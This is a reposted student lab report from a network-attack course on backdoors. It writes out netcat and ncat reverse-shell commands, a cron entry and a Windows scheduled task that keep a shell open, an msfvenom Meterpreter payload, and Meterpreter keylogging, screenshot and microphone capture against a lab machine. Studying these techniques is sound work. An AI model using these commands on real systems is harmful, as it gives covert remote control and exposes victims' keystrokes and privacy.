20144303石宇森《网络对抗》后门原理与实践

最新推荐文章于 2024-06-15 11:43:54 发布
最新推荐文章于 2024-06-15 11:43:54 发布
阅读量77 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/20144303sys/p/6583059.html
版权

20144303石宇森《网络对抗》 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows:用户自己运行了后门软件、设置了任务计划启动

  • linux:设置了cron启动,在到达规定的时间时后门启动

(3)Meterpreter有哪些给你映像深刻的功能?

最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。

细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。

(4)如何发现自己有系统有没有被安装后门?

简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。

实验总结与体会

实践总结:

  • 通过此次实验,掌握了一下基本内容:
  • Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
  • linux如何获取目标主机的shell:通过命令nc -l -p打开端口,等待目标主机连接即可获得其shell
  • 学会打开cron启动
  • 掌握打开任务计划启动的方法
  • 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
  • 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)

心得体会

完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!

实验过程记录

一、使用netcat获取主机操作Shell,cron启动:

Windows获取linux的shell:

1、在Windows下查看主机的ip地址

884664-20170319233157526-1230946379.jpg

2、ncat.exe -l -p 4303 打开监听

884664-20170319233205151-546442389.jpg

3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows

884664-20170319233210495-678297925.jpg

4、Windows获得了linux的shell

884664-20170319233215557-1026959587.jpg

linux获得Windows的shell:

1、查看linux的ip地址

884664-20170319233226354-1247236447.jpg

2、nc -l -p 4303打开监听端口

884664-20170319233230510-1233772011.jpg

3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上

884664-20170319233236432-1941410749.jpg

4、linux获得了Windows主机的shell

884664-20170319233240791-716636378.jpg

cron启动:

1、Windows打开监听端口

884664-20170319233258166-117088493.jpg

2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为

45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh

884664-20170319233302026-1346963464.jpg

3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell

884664-20170319233307323-53492865.jpg

二、使用socat获取主机操作Shell, 任务计划启动

1、新建一个触发器,开始任务选择工作站锁定时。

884664-20170319233319354-174274623.jpg

2、新建操作,选择启动程序,程序定位到socat.exe,参数填

tcp-listen:4303 exec:cmd.exe,pty,stderr

884664-20170319233324713-70773817.jpg

3、按ALT+L锁定计算机用户,使新建的操作触发

884664-20170319233329745-1716459735.jpg

4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell

884664-20170319233336166-1328771501.jpg

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序

884664-20170319233348620-1578316301.jpg

2、windows打开监听端口,等待linux传输后门文件

884664-20170319233352620-1099602396.jpg

3、kali端将后门软件传输给Windows

884664-20170319233614557-298036932.jpg

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、输入msfconsole进入msf控制台

884664-20170319233619120-210405002.jpg

2、修改IP地址和端口号

884664-20170319233624104-1645740874.jpg

3、在windows下打开后门软件

884664-20170319233629463-974700280.jpg

4、使用exploit命令对Windows进行攻击

884664-20170319233635120-657086641.jpg

5、攻击成功,kali获得了Windows的shell

884664-20170319233640307-8095376.jpg

6、screenshot命令截取目标机的屏幕

884664-20170319233646088-1551456564.jpg

884664-20170319233721182-189855487.jpg

7、使用摄像头拍照、录像。(不知为何失败了)

884664-20170319233735510-1443499656.jpg

8、使用命令record_mic截取一段音频

884664-20170319233741745-2121730157.jpg

9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息

884664-20170319233748213-1231472199.jpg

10、查看当前用户

884664-20170319233759401-1454492097.jpg

11、查看文件

884664-20170319233806182-652548951.jpg

12、命令靶机关机

884664-20170319233814526-1023976.jpg

884664-20170319233825166-907482294.jpg

转载于:https://www.cnblogs.com/20144303sys/p/6583059.html

weixin_30846599
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
扑克牌斗24点游戏系统设计与实现 C语言
12-23
在学习C语言的一个学期后,对利用C语言完成编程能力的测试是很有必要的,本测试力图利用C语言完成一项小游戏(扑克牌斗24点)软件的...另外,本练习通过使用“堆栈来求表达式的值”的原理,完成了游戏结果求解和判断。
阿里巴巴安全峰会PPT:永别了SQL注入-陈宇森
07-14
阿里巴巴安全峰会PPT:永别了SQL注入-陈宇森
20144303 石宇森网络对抗技术》免杀原理实践
weixin_30843605的博客
03-26 131
20144303 石宇森网络对抗技术》免杀原理实践 一、基础问题回答 (1)杀软是如何检测出恶意代码的? 1、基于特征码检测:每个程序都会有一段特征码,或者说是一段数据。杀毒软件可以检测某个程序的特征码是否包含恶意代码的特征码,以此来判定是否为恶意代码 2、启发式检测:杀毒软件检测某个程序在系统中做的事情,是不是恶意代码做的事情。以此来判断是不是恶意代码 3、基于行为的检测:也是启发式的一种...
20144303石宇森网络对抗》 WEB基础实践
weixin_30745553的博客
05-07 81
20144303石宇森网络对抗》 WEB基础实践 实验后回答问题 一、什么是表单 表单是一个包含表单元素的区域。用form来定义。 HTML是静态显示网页的,无法跟服务器进行交互,所以表单就是跟服务器进行交互的一种方式,用来搜集用户的输入。打个比方,我们在很多网站上登录时,登录框就是表单构成的。 表单能包含input元素,比如文字段、复选框、单选框、提交按钮等等。表单还可以包含 menus、t...
20144303石宇森网络对抗》Web安全基础实践
weixin_30755709的博客
05-14 60
20144303石宇森网络对抗》Web安全基础实践 实验后问题回答 SQL注入攻击原理,如何防御: SQL攻击时通过在输入框中输入语句,构造出SQL命令,把这段命令注入到表单中,让后台的数据库执行恶意的SQL语句以实现攻击。 防御方法:采用sql语句预编译和绑定变量是最佳的方法。在不能使用sql语句预编译的情况下,可以严格的检查参数的数据类型以及格式。 XSS攻击的原理,如何防御: XSS攻击也...
20144303石宇森网络对抗技术》 恶意代码分析
weixin_30896511的博客
04-02 99
20144303石宇森网络对抗技术》 恶意代码分析 实验问题回答 一、实验后回答问题 (1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。 首先,可以使用的监控方法有wireshark捕获数据包、sysmon监视系统活动记录、使用计划任务每隔一定时间获取一下每个进程联网的状态。 可以监控注册表的变化,文...
20144303石宇森网络对抗》逆向及Bof基础
weixin_30535043的博客
03-05 95
20144303石宇森网络对抗》逆向及Bof基础 一、实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 我们将学习两种方法: 利用f...
20144303石宇森网络对抗》MSF基础应用
weixin_30500105的博客
04-16 80
20144303石宇森网络对抗》MSF基础应用 实验后回答问题 一、解释什么是exploit,payload,encode: 我认为exploit就是一个简单的攻击指令,就是对配置所有设置之后的攻击下发攻击的总命令。而payload是指攻击载荷,是真正的攻击过程中用到的东西,是进行攻击时的实体东西。ecode进行重新编码,为了躲过查杀,是攻击隐蔽起来,是一个伪装的过程。 实验总结与体会 这次的实...
20144303 石宇森网络对抗》信息收集和漏洞扫描技术
weixin_30778805的博客
04-22 146
20144303 石宇森网络对抗》信息收集和漏洞扫描技术 实验后回答问题 (1)哪些组织负责DNS,IP的管理。 ICANN负责全球范围内DNS和IP的管理和空间分配。同时,也设有地区性组织来划分和管理各个地区的IP和DNS。像亚太互联网络信息中心(APNIC) 负责亚洲太平洋地区,世界互联网组织(RIPE)主要负责欧洲地区还有中东和中亚部分地区,美国Internet号码注册中心(ARIN) 负...
20144303石宇森网络对抗技术》 网络欺诈技术防范
weixin_30551963的博客
04-30 180
20144303石宇森网络对抗技术》 网络欺诈技术防范 实验后回答问题 (1)通常在什么场景下容易受到DNS spoof攻击 DNS攻击一般是dns spoof在局域网内嗅探到有DNS请求的数据包,分析数据包中的内容,然后伪造的回应包来回应请求,将访问的域名重新指到另一个IP地址,以此完成攻击。 因此,DNS spoof攻击容易发生在局域网内,像某一区域内公用的WiFi、连接在同一个手机热点上...
20144303石宇森 《信息安全系统设计基础》课程总结
weixin_30938149的博客
12-25 99
20144303石宇森 《信息安全系统设计基础》课程总结 每周作业链接汇总 第0周学习总结 简要内容: 了解课程内容,阅读老师的博客。之后对学习内容进行总结,提出自己不懂以及最想解决的问题。安装虚拟机,学会其简单的操作方法。 二维码: 第1周学习总结 简要内容: 对实验楼中的内容进行实践学习。了解linux系统,学会基本概念和操作,如终端、用户管理、文件创建、删除等等。对linux的...
2016.陈宇森.CTF与安全人才培养_ctf_
10-01
CTF大全2016.陈宇森.CTF与安全人才培养
阿里安全峰会2015 PPT合集-上
07-24
永别了SQL注入-陈宇森 疗一疗本土浏览器-gainover 不可忽视的业务安全问题-唯品会 LTE网络环境下的业务安全保障体系-何文杰 从高危漏洞看电商金融安全-曾裕智 内存喷射在安卓Root利用中-陈良 malicious-domain-...
linux权限
最新发布
binhyun的博客
06-15 380
1.指令收尾 (1)打包和压缩相关的说明 (2)bc指令 (3)系统配置 (4)nano指令 2.热键的介绍 3.指令的运行原理 (1)简单理解 (2)进一步说明
源码编译安装LAMP
潇的博客
06-12 832
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
windows命令帮助大全
xiansibao的博客
06-13 542
用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e] [/f]串行端口: MODE COMm[:] [BAUD=b] [PARITY=p] [DATA=d] [STOP=s]例如: 'FINDSTR "hello there" x.y' 在文件 x.y 中寻找 "hello" 或。- 必须在验证登录的域中的所有服务器上运行 Net Logon 服务。/UNILOG+:文件 :: 以 UNICODE 方式将状态输出到日志文件(附加到现有日志中)。
现代操作系统(第四版)课后习题-5.输入/输出
qq_39071254的博客
06-09 1402
现代操作系统(第四版)课后习题-5.输入/输出
liunx操作命令后台运行的命令
keyboard专栏
06-14 231
要将命令在后台运行,你可以使用以下几种方法。具体方法取决于你的操作系统和具体需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值